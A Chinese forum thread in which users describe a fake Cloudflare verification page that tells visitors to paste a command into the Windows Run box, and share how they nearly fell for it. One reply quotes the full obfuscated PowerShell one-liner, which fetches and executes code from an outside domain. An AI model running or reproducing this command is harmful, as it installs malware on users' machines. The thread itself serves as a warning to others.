好像这几天就看到 V2er 有中招的,我今天访问 binchekc/IO 这个网站的时候,第一次出现 IP 被禁止访问,好嘛很正常有些网站是会屏蔽中国 IP ,然后切到科学 IP 访问出现一个伪装成 cloudflare 验证的界面
当时就有点脑子愣住,为啥要 win+R ,还没反应过来这是 run 窗口,然后也按下了 ctrl+V,突然反应过来不对,迅速关闭窗口,命令并没有执行
具体命令我就不帖了,免得有人意外中招
 |
1
afkool 1 day ago
说句丢人的话,我也中过。。。有时候不是不知道套路,就是纯粹脑子短路+手比脑子快
我还干过双击 exe 的事。。。鼠标按之前脑子就觉得不对,但是手指还是双击了。。 |
 |
2
crazyq 1 day ago
我干过,是一个查卡 bin 的网站。。害。
我中的可以参考这个: https://zelenka.guru/threads/10062663/ |
|
3
crazyq 1 day ago  1
因为装了 ditto ,当时复制的内容还有:
powershell.exe -wIND miniMize $VHv='ExportedCommands';$AbM=IPMO 'M*.P*.U*' -Pass;$AbM=$AbM.$VHv.Values.Name;$Lmp=$AbM[52];$psA=$AbM[51];.$psA(.$Lmp nucleotidally.com);$UMfUnikKYAscuONIMqeIzgmmnJeTSBRNxjawkdlLDxjBjeTztLGJTyfamMjinfrrjJLLmIockpBOnpRYAOVQZQuoQbMkBBayYMARietEUAodAHbGrliFyLrxITbBAUzhuCeNovchmXHPYvRxVBudWJXZLfIuPPJNgbgnVrnsarsHWyNiMWDulJjJSqYSjjaYpKsaduZehjtuCGnwXVqidZgrDawNqqIwPXgalGhQBQqdPGfhoobjsKTqjxTNjqhhxvPGqQEcPDiRjmlLnvYosZHONZNRAwCTTJzlWkqsjLjzInBfjCcTUbHQzTOMbCNszlTyqdIAaMooRdOcTvqfoHoETNoFFJHsAQSgIgrfwzLMBfQnJnXrXjuQuznOruVJtlVAQLvMOaEJYZbFPaMpshhEWcURszSHtyEiCLCPGWEXTfMOfxaeFl |
 |
4
HTDit 1 day ago via Android
我在 linux 和 win 下打开这个网站,win 下出现这个验证,linux 直接被 cloudflare ban ip ,这个是网站本身的问题吧,挂马了这是??在我多次刷新后,进入首页,看着像是一个正常的网站。
我记得前不久遇到过类似的,那是为数不多想尝试下使用传统网页搜索时候,当时一口气打开好几个网页,有一个类似,不过是先让你点验证,然后不过,给你一串字符,我已经忘记当时有没有在电脑上执行命令,然后再电脑和虚拟机里都查了一下命令历史,没有执行过,用微软默认的安全软件扫了一遍,也没有发现病毒。应该是当时嫌验证烦直接关掉了页面。 以后要谨慎了,这种方法在大脑处理多件事的时候,极易中招。我试了用 adblock plus 插件,不报毒。 不知道那些宣传安全过滤病毒网站的商用 vpn 是否能检测得到。 |
 |
6
knifelf 1 day ago via iPhone
这玩意儿会给 agent 装个 skill
|
Select Language